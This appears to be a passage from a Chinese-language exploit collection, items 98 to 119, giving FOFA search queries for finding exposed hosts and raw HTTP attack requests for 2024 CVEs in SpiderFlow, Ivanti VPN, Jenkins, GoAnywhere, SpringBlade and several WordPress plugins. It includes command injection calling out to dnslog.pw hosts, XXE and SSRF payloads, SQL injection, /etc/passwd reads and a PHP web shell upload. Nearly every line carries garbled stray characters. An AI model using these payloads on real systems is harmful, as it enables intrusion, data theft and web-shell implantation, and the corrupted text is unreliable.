. I8 ^" \2 Y! L* A6 |( i4 L- XAccept-Encoding: gzip' b0 Z9 Y4 }) c" Z8 r9 G
Connection: close
+ x) |: r( g$ a4 f0 F/ ZCookie: rememberMe=PAYLOAD
! z  X5 m8 K4 E9 f( l3 O# JX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
8 S4 F- T5 r. J! |" _( H8 a/ {: g. A6 C. t: A3 t& q/ ]' U

3 Z( O. S5 ^+ g- j+ e98. SpiderFlow爬虫平台远程命令执行
4 [- P+ F& w# sCVE-2024-01950 `2 f# Q2 L. V0 `/ A
FOFA:app="SpiderFlow"
3 l3 M- }6 M; Z: DPOST /function/save HTTP/1.1
3 w; d3 j( k+ ?( C; DHost: 192.168.40.130:8088
& F9 F4 M" i3 F  e/ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 N" [4 @7 e" b0 U8 K0 \; A
Connection: close
1 ~2 `4 D! B+ O9 ^3 v# pContent-Length: 121/ M5 }* p# I( ^: ^
Accept: */*
# ]3 o  H& o2 K1 o" O6 l, ?Accept-Encoding: gzip, deflate
- w) I( T6 h9 z7 x9 `& }( HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' W/ ^$ {! o9 @5 f$ cContent-Type: application/x-www-form-urlencoded; charset=UTF-8( ?8 O2 E+ U/ L/ R" X
X-Requested-With: XMLHttpRequest
! X. O& a+ a' ^9 @+ |* Z$ N3 q
5 R4 Y/ r% H: [- @5 V2 v, a5 Yid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
' t  ]: \1 i  r2 f+ w+ a) Y) j; j" c8 v0 d( Q

, n  O0 @  U0 M: _# z  m99. Ncast盈可视高清智能录播系统busiFacade RCE5 o9 v3 k5 I8 m* P) `% R
CVE-2024-0305
1 F4 l7 x) a9 Y3 |# V/ JFOFA:app="Ncast-产品" && title=="高清智能录播系统"
: U3 Y& m& M' KPOST /classes/common/busiFacade.php HTTP/1.1. A8 P; ^$ \! e. s! C
Host: 192.168.40.130:8080, H& A# Y6 m- o7 q' B/ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; i6 W9 M1 E7 l3 o( t5 T$ v+ WConnection: close9 @- Z; ^3 D; p7 j% k: u5 ?1 _
Content-Length: 154( u4 |/ U! X7 E
Accept: */*5 c( l3 M6 K4 Y' @8 V6 y
Accept-Encoding: gzip, deflate
  t: ^1 R$ |& {' FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' d- O0 S: O2 F  L, z+ L+ i2 g, ^) b
Content-Type: application/x-www-form-urlencoded; charset=UTF-8! I4 |8 q( ^) E4 |1 g
X-Requested-With: XMLHttpRequest
) n! O7 {# r8 }: D. ^/ C! c: \1 i# k" |1 A: s/ g
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
2 t1 [* V  b: [. c& t5 @3 C3 J
, ~3 {1 S, t9 R% B
1 \6 t2 G7 X$ @0 {% R8 O6 J" Q100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传- D6 P9 M' A* ^8 |( J; e
CVE-2024-0352
& n$ P) l+ Q3 T% l* g5 Q4 QFOFA:icon_hash="874152924"
% Y! d% P' C/ u9 v- ~; J+ {POST /api/file/formimage HTTP/1.1# S; S& t3 H, U# b+ }# B
Host: 192.168.40.130
/ }1 W, E. _9 I4 ~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
" N6 v" A! i* }Connection: close
% s, W% N$ w6 m7 Z- ~Content-Length: 201
7 F3 g1 D  A6 }- HContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
# v+ B  J! b& V0 ?) i8 xAccept-Encoding: gzip
$ H0 R% L7 V( D4 z, V6 L" @% Y( t0 q
5 c& c: ]% y% C$ e- D------WebKitFormBoundarygcflwtei
, P$ C+ T/ f' [6 F4 @  Y+ J( n8 ?" dContent-Disposition: form-data; name="file";filename="IE4MGP.php"
! x0 ?& q' D: g7 Y# k( i4 nContent-Type: application/x-php. Z' N- ]+ M1 x. w

. q1 z: ?2 Z9 T0 h# d2 `9 L2ayyhRXiAsKXL8olvF5s4qqyI2O
6 d9 ~2 E/ D, t8 Z- h------WebKitFormBoundarygcflwtei--
% V, A1 B4 a( P) v7 g/ i
" g1 ]1 L" Q6 V% ^9 E2 i0 @; j6 O) q, i! r; b
101. ivanti policy secure-22.6命令注入
; ~1 y, B- R' Z2 GCVE-2024-218870 b6 I8 }( p9 F* R
FOFA:body="welcome.cgi?p=logo"  U$ ]8 f# e% u1 [* k& B
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.19 J9 m; E0 k/ B" I/ T& ]
Host: x.x.x.xx.x.x.x
& [: Q! q/ s0 e8 P5 C; ^+ O1 L8 OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 P& v( \2 R. Y5 C7 k. h
Connection: close
# Q  i3 i1 G" t* q; G1 A" mAccept-Encoding: gzip9 f( e: g- L- {' \, j* ?
) J3 y5 e* |5 ]& {) L$ t; ^2 E

9 t) }! r+ u3 W2 ?8 V! o( P8 s8 D9 {' G102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
$ W: G6 x6 F( K6 v3 F7 I: ZCVE-2024-21893
: ~+ m+ p- i5 f1 R7 {% YFOFA:body="welcome.cgi?p=logo"
7 V9 R& d4 e( Y* K- tPOST /dana-ws/saml20.ws HTTP/1.14 ~, s$ z7 T8 Z4 w4 d' A
Host: x.x.x.x
+ e& X0 x4 Q8 t/ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' B% D0 m; a# m. nConnection: close8 ?( G+ a4 @2 k& U$ i! B+ E
Content-Length: 792
+ }- R1 V8 h/ F# F" XAccept-Encoding: gzip
. T" i! T. t. V7 e& G0 r# m/ W. O
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>. R+ e# |+ H9 z# R

, |$ B+ D( d+ l' j7 F- _103. Ivanti Pulse Connect Secure VPN XXE
- D, y# n/ Y( t: PCVE-2024-22024) q7 }. s8 j0 B
FOFA:body="welcome.cgi?p=logo"( ]5 w$ J9 w/ t4 j8 ]6 u
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
: v2 q* T' |; F' XHost: 192.168.40.130:1119 o& q% D/ _( j, Q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
4 h+ k( R7 n3 O' l  D# @) \Connection: close
2 R5 f- R5 J: F) j& a! J$ aContent-Length: 2043 I! S: S$ V* R/ s# }
Content-Type: application/x-www-form-urlencoded
* e' T9 `% ^; ~- ]( p! x! lAccept-Encoding: gzip8 z: n' }# h8 r7 z0 ]* S

6 q2 Y- b+ @- `" m9 PSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
; o% r/ ^& w; q- G* k4 R- n' [. e
0 @4 @4 T2 N. v2 x* X) V+ I- m# k1 X% J# \3 O: e! A" p0 o: D
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
4 R; H; Q8 H2 }; [$ X<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
+ r+ R7 ?% i: ?9 i4 c+ j4 r0 B) s- I4 O' G" X

: D- x+ B/ O% Q7 V  I9 J4 m1 `104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露0 A2 k/ d: m) K( a8 j, P5 a
CVE-2024-05690 w9 a% Z6 Z/ ~; o. S( r( c# g; }& r4 G
FOFA:title="TOTOLINK"
: P3 o) L: e+ {) FPOST /cgi-bin/cstecgi.cgi HTTP/1.14 A2 D/ e& J3 y7 t5 X0 ]& ]
Host:192.168.0.1
' k, X. q" C7 i! H  V, bContent-Length:413 {* H9 e% }. O: v, M& e
Accept:application/json,text/javascript,*/*;q=0.01
) }" R$ O8 i* \$ P% h+ J! H  oX-Requested-with: XMLHttpRequest& [# N- P; |& {$ X1 z1 Q  n
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
5 H; I/ o2 ]2 `  rContent-Type: application/x-www-form-urlencoded:charset=UTF-8/ s; @4 [# c! M, q
Origin: http://192.168.0.1  q$ e+ L" X8 M. C4 C6 I. {
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
" N3 c  H# t! X1 m- MAccept-Encoding:gzip,deflate
3 ?+ }8 |% O# Q# c/ a$ _Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7- l) {% i# I9 U3 V  a- |8 f
Connection:close4 W9 n# N; z" H2 k7 u4 O" Q) z9 f8 [
; Y4 {* X: S9 n7 e% _
{
: F1 L  }- ^5 _"topicurl":"getSysStatusCfg",
" G1 \1 x* h8 Z1 u3 z"token":""
! s7 x# o; B, O* v* M' Q}
$ l3 n  k4 N% ~; t, G1 t+ h
5 M: m# Q% |9 a# \3 E6 C105. SpringBlade v3.2.0 export-user SQL 注入
) A0 s: U1 g  k$ uFOFA:body="https://bladex.vip"$ ]0 [5 @2 l! i' q2 T/ g4 J7 S
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
: ?$ O3 _/ n7 q8 ]" t" i3 a
' E# f8 A; C2 p1 k/ v+ Y" N106. SpringBlade dict-biz/list SQL 注入
% u: W! W' j7 ^9 A7 rFOFA:body="Saber 将不能正常工作", S4 J1 u% K1 s& L
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1/ M  N3 M9 M% g6 }
Host: your-ip
6 F, j% j6 Z' L% o, H0 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 J5 h% |' P/ j) p' y3 o+ Z
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A$ ]! o- D) E  J/ h' Z
Accept-Encoding: gzip, deflate) A* R; q5 Z4 B. V: C1 O
Accept-Language: zh-CN,zh;q=0.9* K! M2 W( x6 b1 Q: X  T2 u8 A
Connection: close
  ~3 u3 ^# ~0 g+ _+ t
1 e  K5 D( N$ a$ L6 ]( C8 Z7 b9 o- m/ U3 j
107. SpringBlade tenant/list SQL 注入9 J! f; g$ a$ F) d$ x
FOFA:body="https://bladex.vip"& n) J- X  m- G4 B! B+ ~4 ^
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1& }  T* Y% m7 u/ B! B
Host: your-ip$ j& f* M) ?1 \+ H' a0 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ w6 e0 W4 T: f
Blade-Auth:替换为自己的
7 o' r/ F  d% E4 h0 i: hConnection: close
# N- b5 c  w* C" T# i% n, u% ]& ^8 l1 }1 w  R" z1 a7 g

5 N8 e) r: ~4 p" C5 y, E& |108. D-Tale 3.9.0 SSRF
( c; E0 X" Z! ECVE-2024-21642. z$ r6 e  w7 d1 T
FOFA:"dtale/static/images/favicon.png"- J/ [4 B# P5 \! U
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1. m8 U6 y3 {/ Y2 L
Host: your-ip% r9 E4 [% R! P; W4 t) W5 Q
Accept: application/json, text/plain, */*
  |8 s% F- }# Y" i2 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; z; |" `- J; h' |1 c% B( ?/ MAccept-Encoding: gzip, deflate! V& H+ }* d' z8 h& L+ u5 o4 x$ [
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8, k1 Q% R9 J5 L" u* G$ z) t
Connection: close
) h% H, s, z) u/ ~0 h  f% \" `! w" P% S: k+ W

- E9 {) ~% h) N" Q% y109. Jenkins CLI 任意文件读取
" ]# [& f4 I0 Q3 ^CVE-2024-23897( h, M5 R! N! n6 }& j! w
FOFA:header="X-Jenkins", ^7 E4 K; U! b; w) O1 g. ~
POST /cli?remoting=false HTTP/1.13 H9 \4 n; c0 f% D) {. g2 L( p2 g6 @
Host:% \& i/ S; B# h
Content-type: application/octet-stream4 m# s, w# h$ e
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92, F; V7 M7 f6 I) |$ Q% G- m! \1 x
Side: upload1 ]4 q, d  j8 T
Connection: keep-alive
3 o  K) C- ?5 e4 o# g& ?/ N$ KContent-Length: 163
$ S& A1 x* O  z- t
: r% S5 d9 U3 B% ^b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
4 G. {% P# U' a$ \! y  T# I/ s5 d9 T$ P! }/ d2 ~
& Z2 V. I1 g8 z& D6 Y
POST /cli?remoting=false HTTP/1.1- s0 B! }8 i0 i% F
Host:
, v6 u. |; i3 g+ D" b/ l1 n' USession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
3 }' o6 r6 t- C3 _6 B3 ~* z4 Edownload2 p0 T& k5 H6 f& F6 I
Content-Type: application/x-www-form-urlencoded
; v. P; D7 ]9 A  K/ FContent-Length: 0
3 b) A, L  _- h) w& o: p6 f
2 z7 \) N. S6 U. i6 l* X7 q% k" m, `5 e0 G2 J& y
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
" v; A, N3 c; n/ x9 \java -jar jenkins-cli.jar help
3 S4 a! F$ j: R[COMMAND]
; |: q$ a- S) _5 ?Lists all the available commands or a detailed description of single command.3 @: G% [9 i7 I- I4 L9 F
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
# ]" B# [0 i" j, k, b5 v( C( i+ @. p" w9 j$ d4 q, {

1 o3 d+ k1 G; L% s110. Goanywhere MFT 未授权创建管理员
" I+ z4 f" I4 pCVE-2024-0204% M5 j+ a& B" j: X- z
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
! Y) U" ]4 o' _GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
4 ?% e$ w: u( O/ l$ I) xHost: 192.168.40.130:80006 J1 b' }# Q& W1 y8 X4 p0 f9 ~
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
, c4 L! Q9 c7 z5 o" v/ G0 I% J1 S5 KConnection: close/ {1 r  e. g- W: S! y
Accept: */*
/ ~. c' C% _3 e3 X/ SAccept-Language: en; a/ w- m  e- q1 ?7 i( v6 @, ~  G) |3 f
Accept-Encoding: gzip
' {1 m3 H# i" B+ q) K: J1 S8 i$ ?8 L& g8 C" j& p
" Z1 \+ I1 ?5 j* z" _+ D
111. WordPress Plugin HTML5 Video Player SQL注入  ^# a. ?% [+ ^. J& o! @
CVE-2024-1061. Q' k/ J+ N" C6 V4 @8 b
FOFA:"wordpress" && body="html5-video-player"
% `9 C) S0 X% ]GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.17 ^# d4 v% r( u  F' `  I
Host: 192.168.40.130:112
, \0 B9 {2 u+ y6 aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 a& x+ y+ I! C; BConnection: close
, F* {) Q" W0 rAccept: */*  {; E8 Q% s5 U2 H: l: [
Accept-Language: en
1 R% F- W7 c8 Q" U- B3 S7 z# o% ?Accept-Encoding: gzip/ H/ _7 {, j1 a4 Y% m$ F

! [0 f7 W; ?5 k' ?
2 T0 b" D3 j% S112. WordPress Plugin NotificationX SQL 注入
2 C" m# ^# A# x" A" ]CVE-2024-1698
1 j* i* Z/ z3 g# lFOFA:body="/wp-content/plugins/notificationx"( m2 G; `# B8 Y' G" k
POST /wp-json/notificationx/v1/analytics HTTP/1.17 Y% s! v' ?8 |4 A+ `6 k
Host: {{Hostname}}$ N" V7 N( P7 _) u9 X+ f; n4 H
Content-Type: application/json, V2 p9 B; T) o

0 l2 Y, M- w" a$ c  X; P{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
- g; d7 }/ e. }5 q' r# v' K1 s% W' ^. o8 e) b
2 O# i( C. B( u9 {9 U
113. WordPress Automatic 插件任意文件下载和SSRF
9 ~2 N2 K2 Q1 XCVE-2024-27954) F3 u0 P4 ~' i
FOFA:"/wp-content/plugins/wp-automatic"/ E; k6 q4 r8 T( @6 M; I: E. C
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
( _  U8 B$ f' r; j+ `+ W% AHost: x.x.x.x: g* P1 f8 r' g5 ~, I& a  k
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36+ d  J5 B# B- N2 A
Connection: close
$ h/ O, L- F  {7 C4 gAccept: */*; T1 S2 r+ W) ]. Y$ d1 J' O
Accept-Language: en
& d! G( z6 ?) W% z8 p9 y8 _" xAccept-Encoding: gzip) k8 l6 r+ P  ?* D% d. Q( n

$ e! Q! _1 E/ @+ E: U+ j" X! ^4 X3 Q3 Y  F  e. ]* V
114. WordPress MasterStudy LMS插件 SQL注入8 k% |  y* h1 E
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"3 N1 I. f7 E4 U/ w
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
% V' C7 ?% y( i- n& Y3 M7 U3 sHost: your-ip3 k2 C1 u2 U1 i5 _) r
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 H( I2 i4 j- }4 z5 s4 P+ {6 G/ F6 p
Accept-Charset: utf-8+ q& v/ \0 z9 S
Accept-Encoding: gzip, deflate0 N2 _: p" J) S" r: V! ]8 m
Connection: close2 l9 I- I# W) B# d& U- w  n7 q' q
: F. v8 F7 [6 a: L  J7 i: X
( N2 ~8 \# F# l$ ?5 i" b% A  K/ h) }
115. WordPress Bricks Builder <= 1.9.6 RCE/ M! O# o0 G/ l' _+ t
CVE-2024-25600  U% f4 S$ L0 \$ n( `" q# ^( m. m
FOFA: body="/wp-content/themes/bricks/": M& B7 ~  @' Y2 M  Y
第一步,获取网站的nonce值5 o* d& ^8 v9 p8 s7 v
GET / HTTP/1.1
6 e" z' R; [/ ^; W+ r! W8 ~0 p; qHost: x.x.x.x6 j: D9 L" p* y- J8 a
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.366 h2 m; [- @$ _1 ~( F
Connection: close$ y) _4 A% z1 ?- T& N! Q* ^) U' Y- \
Accept-Encoding: gzip
% B+ \5 _1 _! ?4 q9 f5 K6 H6 a! b% U+ g' z+ r/ b
, R! S' g3 d: o! P: o, ~; ^; X" @# W
第二步替换nonce值,执行命令
1 d/ {! ~- O7 I! a; i7 {6 VPOST /wp-json/bricks/v1/render_element HTTP/1.1, n, X* [8 m( w. R. Q+ o
Host: x.x.x.x
9 N& g/ c9 p8 ]1 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ D) a$ Q  c2 V! a6 E3 ~Connection: close, o# O7 E) l7 H& L/ A
Content-Length: 356
) @) l' {$ ?+ t4 p" }$ CContent-Type: application/json
: J1 _  ?" e' J1 C1 a6 o6 iAccept-Encoding: gzip% ]/ I. u' S) Y8 x$ D) E( T

% z/ m6 }: g) Y! b" D8 B4 I6 K{
* Y) L0 B7 S3 W  p"postId": "1",- h' Y  C; q9 {( p& W& [1 }
  "nonce": "第一步获得的值",# s7 Y( W$ `$ g. Q1 E
  "element": {- Z" D  f7 j/ @6 ~' Q0 I4 R
    "name": "container",, ~4 I6 Y5 a; Z' M4 p* H
    "settings": {
7 H: g" i$ y1 }3 S" R5 H7 a4 Z      "hasLoop": "true",6 _% x; T. Q  \
      "query": {" R, ^; r( h! F
        "useQueryEditor": true,
# Y9 r! J# Z1 h3 n9 \. W# z: _        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",2 o: D2 K/ \: n. }: w/ B; c/ B0 m
        "objectType": "post"
5 y' V" C" ?1 Y" I      }
# `0 r. u$ H" N) g1 }    }
+ ~7 F! C. v) g8 f6 \+ v& ^% s  }
) ?7 T5 F9 Y% W* j2 ?! H1 n) f/ |}% A" v# C! b3 E8 R
' `& Y4 o) ^: W( O/ O5 N) f/ _; }$ u4 m
8 x! r8 o  A7 f# q# V4 N
116. wordpress js-support-ticket文件上传
2 G. m  L) e3 H! \! `FOFA:body="wp-content/plugins/js-support-ticket"
# T; i9 O$ i8 B& CPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1# \+ K; r6 }3 k2 w* g" X& @# ]6 i
Host:# y+ V/ T$ x" V1 c1 U* s
Content-Type: multipart/form-data; boundary=--------767099171& g" F1 b# q* r, l6 x' P9 N
User-Agent: Mozilla/5.0! g7 {3 a0 M4 G
5 o, ~7 u. P' z. v) F/ Z6 N
----------7670991713 d# T# ~/ e# C8 v  M! ]
Content-Disposition: form-data; name="action"
$ }* |+ y% Z$ |% ^- h1 T7 h8 sconfiguration_saveconfiguration
# T9 |' x& t: f0 p0 g' q----------767099171
9 ^$ \& I& y# _0 j$ p7 JContent-Disposition: form-data; name="form_request"
0 \- {  g0 y4 B  Z$ a. Ujssupportticket
- u# O1 Z( D" }, q8 S----------767099171" h1 @, z/ _" s3 I! X
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
- M; E) O# M8 y; S% TContent-Type: image/png5 T+ l2 w; f1 }) V
----------767099171--3 y. I: g; l3 g/ M9 Q1 ~. X1 V  _: }% C

( ~$ _. ^- R9 q0 Q
0 p/ g3 T6 X: Y( B! u117. WordPress LayerSlider插件SQL注入  `1 _1 ~- F2 Y4 D: a) b
version:7.9.11 – 7.10.0
0 k; L! ~- @+ N# a4 ?, hFOFA:body="/wp-content/plugins/LayerSlider/"
( X- ]0 _" ?; R) p4 \GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.19 \4 s- {* }$ P( g7 A
Host: your-ip
2 t% F9 \" D: L. z9 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- d& `5 O6 m% P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% {+ A" j8 F; qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- O. i: V2 h  ^, d
Accept-Encoding: gzip, deflate, br0 l* z; ]  G- o8 m
Connection: close
* D- ^. i' u; F$ a4 PUpgrade-Insecure-Requests: 1
- Y; M5 l) E! y. D$ R7 E4 M
2 e3 b1 {4 `& Y3 J4 t# R# Y; ^- w0 N5 i% I; i1 |
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传- u' W. @; I& i% g
CVE-2024-0939
# F; C2 d, |; X9 cFOFA:title="Smart管理平台"4 _# u& O2 O6 M
POST /Tool/uploadfile.php? HTTP/1.1" M: R0 H* _' g8 w# m
Host: 192.168.40.130:8443$ F. _4 p+ o' \% U; w
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
9 V4 ]/ T/ }( JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0* V5 U/ I! ^% x  L% f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* m, |3 r5 }  d. Z% C+ X0 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, p/ F. g4 ?, s  n6 g! {Accept-Encoding: gzip, deflate; Z) e; x; b2 R' R
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
+ K- \/ a8 X7 P0 [, ~& |; @Content-Length: 405
( {- B0 b, D7 ^' \" ]$ T/ S/ k) j; J2 zOrigin: https://192.168.40.130:8443
3 j% A5 J' a8 I, \# Z0 b0 ~# gReferer: https://192.168.40.130:8443/Tool/uploadfile.php
2 h" P8 Q! |+ i6 o+ ^3 ~/ @  {+ bUpgrade-Insecure-Requests: 1! j- F- ^! ^1 x/ H  |9 U# U
Sec-Fetch-Dest: document3 t$ F4 E+ C7 l. a7 c; F7 W" G
Sec-Fetch-Mode: navigate) m8 Y! x; ~- \# y6 b5 i, b
Sec-Fetch-Site: same-origin
2 Q) r3 I( t/ Q* O# _. a0 USec-Fetch-User: ?15 q7 y1 x3 ?6 X/ V$ u/ Q+ r
Te: trailers! [9 ~& d% W% [7 G0 s# y
Connection: close
5 g( d( T7 P6 G5 ~0 Z( l4 h& u2 [1 S8 H6 M/ D
-----------------------------13979701222747646634037182887
) a" v. U+ s. dContent-Disposition: form-data; name="file_upload"; filename="contents.php"
* [7 c5 D  X0 A4 T$ qContent-Type: application/octet-stream
9 K* U8 n; k6 a9 A- ~, |
, @, }! Q1 B9 e2 f<?php
  j. d! F% e; k" x/ y: f9 T; ]' osystem($_POST["passwd"]);
& q& T: q1 N6 y/ ?; \+ L$ s5 Z( _?>4 M0 |1 V% j, A4 v
-----------------------------13979701222747646634037182887
' S- y* v& P  K' gContent-Disposition: form-data; name="txt_path"
4 Y, t5 V- a8 @# u( L8 U7 c9 s6 d4 T
/home/src.php
$ c3 v5 g% _, \) F' W-----------------------------13979701222747646634037182887--
$ Y6 N6 o% r, g
- S+ S0 X3 p9 X) A3 `/ P
6 ^1 i' f$ z% D8 J6 a, e( c访问/home/src.php
( _# ~8 h9 I( N1 Y4 `3 a0 ^; j/ \' H/ s5 f' @
119. 北京百绰智能S20后台sysmanageajax.php sql注入( H- c: Z9 o! F; [$ f
CVE-2024-1254
3 v2 e8 M, P8 ?" C( I7 H  g( KFOFA:title="Smart管理平台"
